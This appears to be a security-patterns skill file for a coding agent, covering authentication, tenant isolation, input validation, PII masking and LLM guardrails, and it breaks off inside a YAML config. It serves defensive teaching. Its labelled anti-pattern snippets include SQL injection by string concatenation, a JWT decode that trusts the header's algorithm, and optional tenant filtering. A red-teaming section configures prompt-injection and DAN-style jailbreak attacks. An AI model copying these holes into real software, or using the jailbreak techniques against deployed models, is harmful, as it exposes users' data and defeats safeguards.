Security Patterns
Security patterns for authentication, defense-in-depth, input validation, OWASP Top 10, LLM safety, and PII masking. Use when implementing auth flows, security layers, input sanitization, vulnerability prevention, prompt injection defense, or data redaction.
Primary Agent: security-auditor
Security Patterns
Comprehensive security patterns for building hardened applications. Each category has individual rule files in rules/ loaded on-demand.
Quick Reference
| Category | Rules | Impact | When to Use |
|---|---|---|---|
| Authentication | 3 | CRITICAL | JWT tokens, OAuth 2.1/PKCE, RBAC/permissions |
| Defense-in-Depth | 2 | CRITICAL | Multi-layer security, zero-trust architecture |
| Input Validation | 3 | HIGH | Schema validation (Zod/Pydantic), output encoding, file uploads |
| OWASP Top 10 | 2 | CRITICAL | Injection prevention, broken authentication fixes |
| LLM Safety | 3 | HIGH | Prompt injection defense, output guardrails, content filtering |
| PII Masking | 2 | HIGH | PII detection/redaction with Presidio, Langfuse, LLM Guard |
| Scanning | 3 | HIGH | Dependency audit, SAST (Semgrep/Bandit), secret detection |
| Advanced Guardrails | 2 | CRITICAL | NeMo/Guardrails AI validators, red-teaming, OWASP LLM |
Total: 20 rules across 8 categories
Quick Start
# Argon2id password hashing
from argon2 import PasswordHasher
ph = PasswordHasher()
password_hash = ph.hash(password)
ph.verify(password_hash, password)# JWT access token (15-min expiry)
import jwt
from datetime import datetime, timedelta, timezone
payload = {
'sub': user_id, 'type': 'access',
'exp': datetime.now(timezone.utc) + timedelta(minutes=15),
}
token = jwt.encode(payload, SECRET_KEY, algorithm='HS256')// Zod v4 schema validation
import { z } from 'zod';
const UserSchema = z.object({
email: z.string().email(),
name: z.string().min(2).max(100),
role: z.enum(['user', 'admin']).default('user'),
});
const result = UserSchema.safeParse(req.body);# PII masking with Langfuse
import re
from langfuse import Langfuse
def mask_pii(data, **kwargs):
if isinstance(data, str):
data = re.sub(r'\b[\w.-]+@[\w.-]+\.\w+\b', '[REDACTED_EMAIL]', data)
data = re.sub(r'\b\d{3}-\d{2}-\d{4}\b', '[REDACTED_SSN]', data)
return data
langfuse = Langfuse(mask=mask_pii)Authentication
Secure authentication with OAuth 2.1, Passkeys/WebAuthn, JWT tokens, and role-based access control.
| Rule | Description |
|---|---|
auth-jwt.md | JWT creation, verification, expiry, refresh token rotation |
auth-oauth.md | OAuth 2.1 with PKCE, DPoP, Passkeys/WebAuthn |
auth-rbac.md | Role-based access control, permission decorators, MFA |
Key Decisions: Argon2id > bcrypt | Access tokens 15 min | PKCE required | Passkeys > TOTP > SMS
Defense-in-Depth
Multi-layer security architecture with no single point of failure.
| Rule | Description |
|---|---|
defense-layers.md | 8-layer security architecture (edge to observability) |
defense-zero-trust.md | Immutable request context, tenant isolation, audit logging |
Key Decisions: Immutable dataclass context | Query-level tenant filtering | No IDs in LLM prompts
Input Validation
Validate and sanitize all untrusted input using Zod v4 and Pydantic.
| Rule | Description |
|---|---|
validation-input.md | Schema validation with Zod v4 and Pydantic, type coercion |
validation-output.md | HTML sanitization, output encoding, XSS prevention |
validation-schemas.md | Discriminated unions, file upload validation, URL allowlists |
Key Decisions: Allowlist over blocklist | Server-side always | Validate magic bytes not extensions
OWASP Top 10
Protection against the most critical web application security risks.
| Rule | Description |
|---|---|
owasp-injection.md | SQL/command injection, parameterized queries, SSRF prevention |
owasp-broken-auth.md | JWT algorithm confusion, CSRF protection, timing attacks |
Key Decisions: Parameterized queries only | Hardcode JWT algorithm | SameSite=Strict cookies
LLM Safety
Security patterns for LLM integrations including context separation and output validation.
| Rule | Description |
|---|---|
llm-prompt-injection.md | Context separation, prompt auditing, forbidden patterns |
llm-guardrails.md | Output validation pipeline: schema, grounding, safety, size |
llm-content-filtering.md | Pre-LLM filtering, post-LLM attribution, three-phase pattern |
Key Decisions: IDs flow around LLM, never through | Attribution is deterministic | Audit every prompt
PII Masking
PII detection and masking for LLM observability pipelines and logging.
| Rule | Description |
|---|---|
pii-detection.md | Microsoft Presidio, regex patterns, LLM Guard Anonymize |
pii-redaction.md | Langfuse mask callback, structlog/loguru processors, Vault deanonymization |
Key Decisions: Presidio for enterprise | Replace with type tokens | Use mask callback at init
Scanning
Automated security scanning for dependencies, code, and secrets.
| Rule | Description |
|---|---|
scanning-dependency.md | npm audit, pip-audit, Trivy container scanning, CI gating |
scanning-sast.md | Semgrep and Bandit static analysis, custom rules, pre-commit |
scanning-secrets.md | Gitleaks, TruffleHog, detect-secrets with baseline management |
Key Decisions: Pre-commit hooks for shift-left | Block on critical/high | Gitleaks + detect-secrets baseline
Advanced Guardrails
Production LLM safety with NeMo Guardrails, Guardrails AI validators, and DeepTeam red-teaming.
| Rule | Description |
|---|---|
guardrails-nemo.md | NeMo Guardrails, Colang 2.0 flows, Guardrails AI validators, layered validation |
guardrails-llm-validation.md | DeepTeam red-teaming (40+ vulnerabilities), OWASP LLM Top 10 compliance |
Key Decisions: NeMo for flows, Guardrails AI for validators | Toxicity 0.5 threshold | Red-team pre-release + quarterly
Managed Hook Hierarchy (CC 2.1.49)
Plugin settings follow a 3-tier precedence:
| Tier | Source | Overridable? |
|---|---|---|
1. Managed (plugin settings.json) | Plugin author ships defaults | Yes, by user |
2. Project (.claude/settings.json) | Repository config | Yes, by user |
3. User (~/.claude/settings.json) | Personal preferences | Final authority |
Security hooks shipped by OrchestKit are managed defaults — users can disable them but are warned. Enterprise admins can lock settings via managed profiles.
Anti-Patterns (FORBIDDEN)
# Authentication
user.password = request.form['password'] # Plaintext password storage
response_type=token # Implicit OAuth grant (deprecated)
return "Email not found" # Information disclosure
# Input Validation
"SELECT * FROM users WHERE name = '" + name + "'" # SQL injection
if (file.type === 'image/png') {...} # Trusting Content-Type header
# LLM Safety
prompt = f"Analyze for user {user_id}" # ID in prompt
artifact.user_id = llm_output["user_id"] # Trusting LLM-generated IDs
# PII
logger.info(f"User email: {user.email}") # Raw PII in logs
langfuse.trace(input=raw_prompt) # Unmasked observability dataDetailed Documentation
| Resource | Description |
|---|---|
| references/oauth-2.1-passkeys.md | OAuth 2.1, PKCE, DPoP, Passkeys/WebAuthn |
| references/request-context-pattern.md | Immutable request context for identity flow |
| references/tenant-isolation.md | Tenant-scoped repository, vector/full-text search |
| references/audit-logging.md | Sanitized structured logging, compliance |
| references/zod-v4-api.md | Zod v4 types, coercion, transforms, refinements |
| references/vulnerability-demos.md | OWASP vulnerable vs secure code examples |
| references/context-separation.md | LLM context separation architecture |
| references/output-guardrails.md | Output validation pipeline implementation |
| references/pre-llm-filtering.md | Tenant-scoped retrieval, content extraction |
| references/post-llm-attribution.md | Deterministic attribution pattern |
| references/prompt-audit.md | Prompt audit patterns, safe prompt builder |
| references/presidio-integration.md | Microsoft Presidio setup, custom recognizers |
| references/langfuse-mask-callback.md | Langfuse SDK mask implementation |
| references/llm-guard-sanitization.md | LLM Guard Anonymize/Deanonymize with Vault |
| references/logging-redaction.md | structlog/loguru pre-logging redaction |
Related Skills
api-design-framework- API security patternsork:rag-retrieval- RAG pipeline patterns requiring tenant-scoped retrievalllm-evaluation- Output quality assessment including hallucination detection
Capability Details
authentication
Keywords: password, hashing, JWT, token, OAuth, PKCE, passkey, WebAuthn, RBAC, session Solves:
- Implement secure authentication with modern standards
- JWT token management with proper expiry
- OAuth 2.1 with PKCE flow
- Passkeys/WebAuthn registration and login
- Role-based access control
defense-in-depth
Keywords: defense in depth, security layers, multi-layer, request context, tenant isolation Solves:
- How to secure AI applications end-to-end
- Implement 8-layer security architecture
- Create immutable request context
- Ensure tenant isolation at query level
input-validation
Keywords: schema, validate, Zod, Pydantic, sanitize, HTML, XSS, file upload Solves:
- Validate input against schemas (Zod v4, Pydantic)
- Prevent injection attacks with allowlists
- Sanitize HTML and prevent XSS
- Validate file uploads by magic bytes
owasp-top-10
Keywords: OWASP, sql injection, broken access control, CSRF, XSS, SSRF Solves:
- Fix OWASP Top 10 vulnerabilities
- Prevent SQL and command injection
- Implement CSRF protection
- Fix broken authentication
llm-safety
Keywords: prompt injection, context separation, guardrails, hallucination, LLM output Solves:
- Prevent prompt injection attacks
- Implement context separation (IDs around LLM)
- Validate LLM output with guardrail pipeline
- Deterministic post-LLM attribution
pii-masking
Keywords: PII, masking, Presidio, Langfuse, redact, GDPR, privacy Solves:
- Detect and mask PII in LLM pipelines
- Integrate masking with Langfuse observability
- Implement pre-logging redaction
- GDPR-compliant data handling
Rules (18)
Auth: JWT Tokens & Password Hashing — CRITICAL
JWT Tokens & Password Hashing
Password Hashing (Argon2id)
from argon2 import PasswordHasher
from argon2.exceptions import VerifyMismatchError
ph = PasswordHasher(
time_cost=3, # Number of iterations
memory_cost=65536, # 64 MB
parallelism=4, # Number of threads
)
def hash_password(password: str) -> str:
return ph.hash(password)
def verify_password(password_hash: str, password: str) -> bool:
try:
ph.verify(password_hash, password)
return True
except VerifyMismatchError:
return False
def needs_rehash(password_hash: str) -> bool:
return ph.check_needs_rehash(password_hash)JWT Access Token
import os
import jwt
from datetime import datetime, timedelta, timezone
SECRET_KEY = os.environ["JWT_SECRET_KEY"]
ALGORITHM = "HS256"
ACCESS_TOKEN_EXPIRE_MINUTES = 15
def create_access_token(user_id: str, roles: list[str] = None) -> str:
now = datetime.now(timezone.utc)
payload = {
"sub": user_id,
"type": "access",
"roles": roles or [],
"iat": now,
"exp": now + timedelta(minutes=ACCESS_TOKEN_EXPIRE_MINUTES),
}
return jwt.encode(payload, SECRET_KEY, algorithm=ALGORITHM)
def verify_access_token(token: str) -> dict | None:
try:
payload = jwt.decode(
token, SECRET_KEY,
algorithms=[ALGORITHM], # NEVER read from header
options={'require': ['exp', 'iat', 'sub']},
)
if payload.get("type") != "access":
return None
return payload
except jwt.ExpiredSignatureError:
return None
except jwt.InvalidTokenError:
return NoneToken Expiry Guidelines
| Token Type | Expiry | Storage |
|---|---|---|
| Access | 15 min - 1 hour | Memory only |
| Refresh | 7-30 days | HTTPOnly cookie |
Refresh Token Rotation
import secrets
import hashlib
from datetime import datetime, timedelta, timezone
def rotate_refresh_token(old_token: str, db) -> tuple[str, str]:
old_hash = hashlib.sha256(old_token.encode()).hexdigest()
token_record = db.query("""
SELECT user_id, version FROM refresh_tokens
WHERE token_hash = ? AND expires_at > NOW() AND revoked = FALSE
""", [old_hash]).fetchone()
if not token_record:
raise InvalidTokenError("Refresh token invalid or expired")
user_id, version = token_record
# Revoke old token
db.execute("UPDATE refresh_tokens SET revoked = TRUE WHERE token_hash = ?", [old_hash])
# Create new tokens
new_access_token = create_access_token(user_id)
new_refresh_token = secrets.token_urlsafe(32)
new_hash = hashlib.sha256(new_refresh_token.encode()).hexdigest()
db.execute("""
INSERT INTO refresh_tokens (user_id, token_hash, expires_at, version)
VALUES (?, ?, ?, ?)
""", [user_id, new_hash, datetime.now(timezone.utc) + timedelta(days=7), version + 1])
return new_access_token, new_refresh_tokenSession Security
app.config['SESSION_COOKIE_SECURE'] = True # HTTPS only
app.config['SESSION_COOKIE_HTTPONLY'] = True # No JS access
app.config['SESSION_COOKIE_SAMESITE'] = 'Strict'Anti-Patterns
# NEVER store passwords in plaintext
user.password = request.form['password']
# NEVER trust algorithm from JWT header
payload = jwt.decode(token, SECRET, algorithms=jwt.get_unverified_header(token)['alg'])
# NEVER reveal if email exists
return "Email not found" # Information disclosure
# ALWAYS use Argon2id or bcrypt
password_hash = ph.hash(password)
# ALWAYS hardcode algorithm
payload = jwt.decode(token, SECRET_KEY, algorithms=['HS256'])
# ALWAYS use generic error messages
return "Invalid credentials"Incorrect — Algorithm confusion vulnerability allows "none" algorithm attack:
# Reading algorithm from untrusted JWT header
header = jwt.get_unverified_header(token)
payload = jwt.decode(token, SECRET_KEY, algorithms=[header['alg']])
# Attacker can set alg="none" to bypass signature verificationCorrect — Hardcode expected algorithm to prevent confusion attacks:
# Always specify the expected algorithm explicitly
payload = jwt.decode(
token, SECRET_KEY,
algorithms=['HS256'], # Never read from header
options={'require': ['exp', 'iat', 'sub']},
)Implement OAuth 2.1 with mandatory PKCE, token rotation, and phishing-resistant passkeys — CRITICAL
OAuth 2.1 & Passkeys/WebAuthn
OAuth 2.1 Key Changes
- PKCE required for ALL clients (not just public)
- Implicit grant removed (security vulnerability)
- Password grant removed (credential anti-pattern)
- Refresh token rotation mandatory
PKCE Flow (Required)
import hashlib, base64, secrets
def generate_pkce_pair():
code_verifier = secrets.token_urlsafe(64)
digest = hashlib.sha256(code_verifier.encode()).digest()
code_challenge = base64.urlsafe_b64encode(digest).rstrip(b'=').decode()
return code_verifier, code_challenge
verifier, challenge = generate_pkce_pair()
# Step 1: Authorization request
auth_url = f"""https://auth.example.com/authorize?
response_type=code
&client_id={client_id}
&redirect_uri={redirect_uri}
&code_challenge={challenge}
&code_challenge_method=S256
&state={state}
&scope=openid profile"""
# Step 2: Exchange code for tokens
token_response = requests.post(
"https://auth.example.com/token",
data={
"grant_type": "authorization_code",
"code": auth_code,
"redirect_uri": redirect_uri,
"client_id": client_id,
"code_verifier": verifier,
}
)DPoP (Demonstrating Proof of Possession)
import jwt, time, uuid
def create_dpop_proof(http_method: str, http_uri: str, private_key) -> str:
claims = {
"jti": str(uuid.uuid4()),
"htm": http_method,
"htu": http_uri,
"iat": int(time.time()),
}
headers = {
"typ": "dpop+jwt",
"alg": "ES256",
"jwk": private_key.public_key().export_key(),
}
return jwt.encode(claims, private_key, algorithm="ES256", headers=headers)Passkeys/WebAuthn Registration
from webauthn import generate_registration_options, verify_registration_response
from webauthn.helpers.structs import (
AuthenticatorSelectionCriteria,
ResidentKeyRequirement,
UserVerificationRequirement,
)
options = generate_registration_options(
rp_id="example.com",
rp_name="Example App",
user_id=user.id.encode(),
user_name=user.email,
authenticator_selection=AuthenticatorSelectionCriteria(
resident_key=ResidentKeyRequirement.REQUIRED,
user_verification=UserVerificationRequirement.REQUIRED,
),
)Passkeys Authentication
from webauthn import generate_authentication_options, verify_authentication_response
options = generate_authentication_options(
rp_id="example.com",
allow_credentials=[
{"id": cred.credential_id, "type": "public-key"}
for cred in user.credentials
],
)
verification = verify_authentication_response(
credential=client_response,
expected_challenge=stored_challenge,
expected_rp_id="example.com",
expected_origin="https://example.com",
credential_public_key=stored_credential.public_key,
credential_current_sign_count=stored_credential.sign_count,
)
# Update sign count (replay protection)
stored_credential.sign_count = verification.new_sign_countFrontend Passkey Implementation
// Registration
async function registerPasskey(options: PublicKeyCredentialCreationOptions) {
const credential = await navigator.credentials.create({ publicKey: options });
await fetch('/api/auth/passkey/register', {
method: 'POST', body: JSON.stringify(credential),
});
}
// Conditional UI (autofill)
if (window.PublicKeyCredential?.isConditionalMediationAvailable) {
const available = await PublicKeyCredential.isConditionalMediationAvailable();
if (available) {
const credential = await navigator.credentials.get({
publicKey: options, mediation: 'conditional',
});
}
}Anti-Patterns
# NEVER use implicit OAuth grant
response_type=token # Deprecated in OAuth 2.1
# NEVER skip PKCE
# PKCE is required for ALL clients in OAuth 2.1
# ALWAYS use PKCE with S256
code_challenge=challenge&code_challenge_method=S256Incorrect — OAuth 2.0 token exchange without PKCE is vulnerable to interception:
# No PKCE verification
token_response = requests.post(
"https://auth.example.com/token",
data={
"grant_type": "authorization_code",
"code": auth_code,
"client_id": client_id,
}
)Correct — OAuth 2.1 requires PKCE for all clients to prevent code interception:
# Generate and verify PKCE challenge
verifier, challenge = generate_pkce_pair()
token_response = requests.post(
"https://auth.example.com/token",
data={
"grant_type": "authorization_code",
"code": auth_code,
"client_id": client_id,
"code_verifier": verifier, # Proves client possession
}
)Enforce role-based access control with multi-factor authentication and rate limiting — CRITICAL
Role-Based Access Control & Multi-Factor Authentication
Role-Based Access Control
from functools import wraps
from flask import abort, g
def require_role(*roles):
"""Decorator to require specific role(s)."""
def decorator(f):
@wraps(f)
def wrapper(*args, **kwargs):
if not g.current_user:
abort(401)
if not any(role in g.current_user.roles for role in roles):
abort(403)
return f(*args, **kwargs)
return wrapper
return decorator
def require_permission(permission: str):
"""Decorator to require specific permission."""
def decorator(f):
@wraps(f)
def wrapper(*args, **kwargs):
if not g.current_user:
abort(401)
if not g.current_user.has_permission(permission):
abort(403)
return f(*args, **kwargs)
return wrapper
return decorator
# Usage
@app.route('/admin/users')
@require_role('admin')
def admin_users():
return get_all_users()
@app.route('/api/patients/<id>')
@require_permission('patients:read')
def get_patient(id):
return get_patient_by_id(id)FastAPI RBAC
from fastapi import Depends, HTTPException, status
from fastapi.security import HTTPBearer, HTTPAuthorizationCredentials
security = HTTPBearer()
async def get_current_user(
credentials: HTTPAuthorizationCredentials = Depends(security)
):
payload = verify_access_token(credentials.credentials)
if not payload:
raise HTTPException(status_code=status.HTTP_401_UNAUTHORIZED)
user = await get_user_by_id(payload["sub"])
if not user:
raise HTTPException(status_code=status.HTTP_401_UNAUTHORIZED)
return user
def require_role(*roles):
async def role_checker(user = Depends(get_current_user)):
if not any(role in user.roles for role in roles):
raise HTTPException(status_code=status.HTTP_403_FORBIDDEN)
return user
return role_checkerMulti-Factor Authentication (TOTP)
import pyotp
import qrcode
from io import BytesIO
import base64
def generate_totp_secret() -> str:
return pyotp.random_base32()
def get_totp_provisioning_uri(secret: str, email: str, issuer: str = "MyApp") -> str:
totp = pyotp.TOTP(secret)
return totp.provisioning_uri(name=email, issuer_name=issuer)
def verify_totp(secret: str, code: str) -> bool:
totp = pyotp.TOTP(secret)
return totp.verify(code, valid_window=1)Complete Login Flow with MFA
@app.route('/api/auth/login', methods=['POST'])
@limiter.limit("5 per minute")
def login():
email = request.json.get('email')
password = request.json.get('password')
user = User.query.filter_by(email=email).first()
# Don't reveal if user exists
if not user or not verify_password(user.password_hash, password):
return {"error": "Invalid credentials"}, 401
if user.mfa_enabled:
mfa_token = create_mfa_pending_token(user.id)
return {"mfa_required": True, "mfa_token": mfa_token}
return issue_tokens(user)Rate Limiting
| Endpoint | Limit |
|---|---|
| Login | 5 per minute |
| Password reset | 3 per hour |
| MFA verify | 5 per minute |
| Registration | 10 per hour |
| API general | 100 per minute |
from flask_limiter import Limiter
from flask_limiter.util import get_remote_address
limiter = Limiter(app, key_func=get_remote_address,
default_limits=["200 per day", "50 per hour"],
storage_uri="redis://localhost:6379")
@app.route('/api/auth/login', methods=['POST'])
@limiter.limit("5 per minute")
def login():
pass
@app.route('/api/auth/password-reset', methods=['POST'])
@limiter.limit("3 per hour")
def password_reset():
return {"message": "If email exists, reset link sent"}Key Decisions
| Decision | Recommendation |
|---|---|
| MFA method | Passkeys > TOTP > SMS |
| Rate limit | 5 attempts per minute |
| Error messages | Generic "Invalid credentials" |
| Account lockout | After 10 failed attempts |
| Backup codes | 10 one-time use codes |
Incorrect — Direct role checks in routes leak user enumeration information:
@app.route('/admin/users')
def admin_users():
if 'admin' not in current_user.roles:
return {"error": "You are not an admin"}, 403 # Reveals role info
return get_all_users()Correct — Generic error messages and proper RBAC decorator prevent enumeration:
@app.route('/admin/users')
@require_role('admin')
def admin_users():
return get_all_users()
# Returns 403 Forbidden with no role details exposedDesign defense-in-depth with eight security layers from edge protection to observability — CRITICAL
8-Layer Security Architecture
Overview
Defense in depth applies multiple security layers so that if one fails, others still protect the system.
Core Principle: No single security control should be the only thing protecting sensitive operations.
The Architecture
Layer 0: EDGE | WAF, Rate Limiting, DDoS, Bot Detection
Layer 1: GATEWAY | JWT Verify, Extract Claims, Build Context
Layer 2: INPUT | Schema Validation, PII Detection, Injection Defense
Layer 3: AUTHORIZATION | RBAC/ABAC, Tenant Check, Resource Access
Layer 4: DATA ACCESS | Parameterized Queries, Tenant Filter
Layer 5: LLM | Prompt Building (no IDs), Context Separation
Layer 6: OUTPUT | Schema Validation, Guardrails, Hallucination Check
Layer 7: STORAGE | Attribution, Audit Trail, Encryption
Layer 8: OBSERVABILITY | Logging (sanitized), Tracing, MetricsLayer Details
Layer 0: Edge Protection
- WAF rules for OWASP Top 10
- Rate limiting per user/IP
- DDoS protection
- Bot detection and geo-blocking
Layer 1: Gateway / Authentication
@dataclass(frozen=True)
class RequestContext:
"""Immutable context that flows through the system"""
user_id: UUID
tenant_id: UUID
session_id: str
permissions: frozenset[str]
request_id: str
trace_id: str
timestamp: datetime
client_ip: strLayer 2: Input Validation
- Schema validation: Pydantic/Zod for structure
- Content validation: PII detection, malware scan
- Injection defense: SQL, XSS, prompt injection patterns
Layer 3: Authorization
async def authorize(ctx: RequestContext, action: str, resource: Resource) -> bool:
if action not in ctx.permissions:
raise Forbidden("Missing permission")
if resource.tenant_id != ctx.tenant_id:
raise Forbidden("Cross-tenant access denied")
if not await check_resource_access(ctx.user_id, resource):
raise Forbidden("No access to resource")
return TrueLayer 4: Data Access
class TenantScopedRepository:
def __init__(self, ctx: RequestContext):
self.ctx = ctx
self._base_filter = {"tenant_id": ctx.tenant_id}
async def find(self, query: dict) -> list[Model]:
safe_query = {**self._base_filter, **query}
return await self.db.find(safe_query)Layer 5: LLM Orchestration
- Identifiers flow AROUND the LLM, not THROUGH it
- Prompts contain only content text
- No user_id, tenant_id, document_id in prompt text
Layer 6: Output Validation
- Schema validation (JSON structure)
- Content guardrails (toxicity, PII generation)
- Hallucination detection (grounding check)
Layer 7: Attribution & Storage
- Attribution is deterministic, not LLM-generated
- Context from Layer 1 is attached to results
- Audit trail recorded
Layer 8: Observability
- Structured logging with sanitization
- Distributed tracing (Langfuse)
- Metrics (latency, errors, costs)
Implementation Checklist
- Layer 0: Rate limiting configured
- Layer 1: JWT validation active, RequestContext created
- Layer 2: Pydantic models validate all input
- Layer 3: Authorization check on every endpoint
- Layer 4: All queries include tenant_id filter
- Layer 5: No IDs in LLM prompts (run audit)
- Layer 6: Output schema validation active
- Layer 7: Attribution uses context, not LLM output
- Layer 8: Logging sanitized, tracing enabled
Industry Sources
| Pattern | Source | Application |
|---|---|---|
| Defense in Depth | NIST | Multiple validation layers |
| Zero Trust | Google BeyondCorp | Every request verified |
| Least Privilege | AWS IAM | Minimal permissions |
| Complete Mediation | Saltzer & Schroeder | Every access checked |
Incorrect — Single-layer auth check is vulnerable if JWT verification is bypassed:
@app.get("/documents/{doc_id}")
def get_document(doc_id: UUID, token: str = Header(...)):
claims = verify_jwt(token) # Only layer
return db.query(Document).get(doc_id)Correct — Multi-layer defense verifies auth, validates input, checks authorization, and filters data:
@app.get("/documents/{doc_id}")
async def get_document(doc_id: UUID, ctx: RequestContext = Depends(get_context)):
# Layer 1: Gateway verified JWT
# Layer 2: UUID validation (Pydantic)
# Layer 3: Authorization
await authorize(ctx, "documents:read", doc_id)
# Layer 4: Tenant-scoped query
repo = TenantScopedRepository(db, ctx, Document)
return await repo.find_by_id(doc_id)Defense: Zero Trust & Tenant Isolation — CRITICAL
Zero Trust & Tenant Isolation
Immutable Request Context
from dataclasses import dataclass
from datetime import datetime, timezone
from uuid import UUID
from typing import FrozenSet
@dataclass(frozen=True)
class RequestContext:
"""
System context that NEVER appears in LLM prompts.
Created at gateway, flows through all layers.
"""
# Identity
user_id: UUID
tenant_id: UUID
session_id: str
permissions: FrozenSet[str]
# Tracing
request_id: str
trace_id: str
span_id: str
# Resource
resource_id: UUID | None = None
resource_type: str | None = None
# Metadata
timestamp: datetime = None
client_ip: str = ""Context Creation at Gateway
from fastapi import Request, Depends
async def get_request_context(request: Request) -> RequestContext:
auth_header = request.headers.get("Authorization", "")
if not auth_header.startswith("Bearer "):
raise HTTPException(401, "Missing authorization")
token = auth_header[7:]
claims = jwt.decode(token, SECRET_KEY, algorithms=["HS256"])
return RequestContext(
user_id=UUID(claims["sub"]),
tenant_id=UUID(claims["tenant_id"]),
session_id=claims["session_id"],
permissions=frozenset(claims.get("permissions", [])),
request_id=request.headers.get("X-Request-ID", str(uuid4())),
trace_id=generate_trace_id(),
span_id=generate_span_id(),
client_ip=request.client.host,
)Tenant-Scoped Repository
class TenantScopedRepository(Generic[T]):
"""Cannot be bypassed - tenant filter is mandatory."""
def __init__(self, session: AsyncSession, ctx: RequestContext, model: type[T]):
self.session = session
self.ctx = ctx
self.model = model
def _base_query(self):
return select(self.model).where(
self.model.tenant_id == self.ctx.tenant_id
)
async def find_by_id(self, id: UUID) -> T | None:
"""Even by-ID lookup includes tenant check."""
query = self._base_query().where(self.model.id == id)
result = await self.session.execute(query)
return result.scalar_one_or_none()
async def find_by_user(self) -> list[T]:
query = self._base_query().where(
self.model.user_id == self.ctx.user_id
)
result = await self.session.execute(query)
return result.scalars().all()Vector Search with Tenant Isolation
async def semantic_search(query_embedding: list[float], ctx: RequestContext, limit: int = 10):
return await db.execute("""
SELECT id, content, 1 - (embedding <-> :query) as similarity
FROM documents
WHERE tenant_id = :tenant_id
AND user_id = :user_id
AND embedding <-> :query < 0.5
ORDER BY embedding <-> :query
LIMIT :limit
""", {
"tenant_id": ctx.tenant_id,
"user_id": ctx.user_id,
"query": query_embedding,
"limit": limit,
})Caching with Tenant Isolation
def cache_key(ctx: RequestContext, operation: str, *args) -> str:
"""Cache keys MUST include tenant_id."""
return f"{ctx.tenant_id}:{ctx.user_id}:{operation}:{':'.join(str(a) for a in args)}"Row-Level Security (PostgreSQL)
ALTER TABLE documents ENABLE ROW LEVEL SECURITY;
CREATE POLICY tenant_isolation ON documents
USING (tenant_id = current_setting('app.tenant_id')::uuid);
SET app.tenant_id = 'tenant-uuid-here';Audit Logging
class SanitizedLogger:
REDACT_PATTERNS = {
r"password": "[PASSWORD_REDACTED]",
r"api[_-]?key": "[API_KEY_REDACTED]",
r"[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}": "[EMAIL_REDACTED]",
}
HASH_FIELDS = {"prompt", "response", "content"}
def audit(self, event: str, **kwargs):
sanitized = self._sanitize(kwargs)
self._logger.info(event, audit=True, **sanitized)Anti-Patterns
# BAD: Mutable context
class RequestContext:
user_id: UUID # Can be changed!
# BAD: Context in prompt
prompt = f"User {ctx.user_id} wants to analyze..."
# BAD: Global query without tenant filter
async def find_all():
return await db.execute("SELECT * FROM documents")
# BAD: Tenant filter as optional
async def find(tenant_id: UUID | None = None):
if tenant_id: # Can be bypassed!
query += f" WHERE tenant_id = '{tenant_id}'"
# GOOD: Tenant from authenticated context only
async def find(ctx: RequestContext):
return await db.find(tenant_id=ctx.tenant_id)Testing Tenant Isolation
async def test_tenant_a_cannot_see_tenant_b_documents(tenant_a_ctx, tenant_b_ctx):
doc = Document(tenant_id=tenant_b_ctx.tenant_id, content="Secret data")
await db_session.add(doc)
repo = TenantScopedRepository(db_session, tenant_a_ctx, Document)
result = await repo.find_by_id(doc.id)
assert result is None # Tenant A cannot see tenant B's dataIncorrect — Optional tenant filtering allows cross-tenant data access:
async def find_documents(tenant_id: UUID | None = None):
query = select(Document)
if tenant_id: # Can be bypassed by omitting parameter
query = query.where(Document.tenant_id == tenant_id)
return await session.execute(query)Correct — Immutable RequestContext makes tenant filtering mandatory and tamper-proof:
async def find_documents(ctx: RequestContext):
# Tenant filter is mandatory via immutable context
query = select(Document).where(
Document.tenant_id == ctx.tenant_id # Cannot be bypassed
)
return await session.execute(query)LLM Red-Teaming and OWASP LLM Compliance — CRITICAL
LLM Red-Teaming and OWASP LLM Compliance
Incorrect -- shipping LLM system without adversarial testing:
# Only testing happy path, no adversarial inputs
def test_chatbot():
response = chatbot.respond("What's the weather?")
assert response # No jailbreak, injection, or bias testing!Correct -- DeepTeam red-teaming audit:
from deepteam import red_team
from deepteam.vulnerabilities import (
Bias, Toxicity, PIILeakage,
PromptInjection, Jailbreaking,
Misinformation, CompetitorEndorsement
)
async def run_red_team_audit(target_model: callable, attacks_per_vulnerability: int = 10) -> dict:
results = await red_team(
model=target_model,
vulnerabilities=[
Bias(categories=["gender", "race", "religion", "age"]),
Toxicity(threshold=0.7),
PIILeakage(types=["email", "phone", "ssn", "credit_card"]),
PromptInjection(techniques=["direct", "indirect", "context"]),
Jailbreaking(multi_turn=True, techniques=["dan", "roleplay", "context_manipulation"]),
Misinformation(domains=["health", "finance", "legal"]),
],
attacks_per_vulnerability=attacks_per_vulnerability,
)
return {
"total_attacks": results.total_attacks,
"successful_attacks": results.successful_attacks,
"attack_success_rate": results.successful_attacks / results.total_attacks,
"vulnerabilities": [
{"type": v.type, "severity": v.severity, "mitigation": v.suggested_mitigation}
for v in results.vulnerabilities
],
}OWASP Top 10 for LLMs mapping:
| OWASP LLM Risk | Guardrail Solution |
|---|---|
| LLM01: Prompt Injection | NeMo input rails, Guardrails AI validators |
| LLM02: Insecure Output | Output rails, structured validation |
| LLM04: Model Denial of Service | Rate limiting, token budgets, timeout rails |
| LLM06: Sensitive Info Disclosure | PII detection, context separation |
| LLM07: Insecure Plugin Design | Tool validation, permission boundaries |
| LLM08: Excessive Agency | Human-in-loop rails, action confirmation |
| LLM09: Overreliance | Factuality checking, confidence thresholds |
Framework comparison:
| Framework | Best For | Key Features |
|---|---|---|
| NeMo Guardrails | Programmable flows, Colang 2.0 | Input/output rails, fact-checking |
| Guardrails AI | Validator-based, modular | 100+ validators, PII, toxicity |
| OpenAI Guardrails | Drop-in wrapper | Simple integration |
| DeepTeam | Red teaming, adversarial | 40+ vulnerabilities, GOAT attacks |
Key decisions:
- Red-teaming frequency: Pre-release + quarterly
- Fact-checking: Required for factual domains (health, finance, legal)
- DeepTeam for 40+ vulnerability types with OWASP alignment
- Always test multi-turn jailbreaking (GOAT-style attacks)
Deploy NeMo Guardrails and Guardrails AI to defend against prompt injection and toxicity — CRITICAL
NeMo Guardrails and Guardrails AI
Incorrect -- returning raw LLM output without validation:
# No input sanitization, no output validation
user_input = request.json["message"]
response = llm.generate(user_input) # Prompt injection risk!
return response # Raw, unvalidated output!Correct -- NeMo Guardrails with Guardrails AI integration:
# config.yml
models:
- type: main
engine: openai
model: gpt-5.2
rails:
config:
guardrails_ai:
validators:
- name: toxic_language
parameters:
threshold: 0.5
validation_method: "sentence"
- name: guardrails_pii
parameters:
entities: ["phone_number", "email", "ssn", "credit_card"]
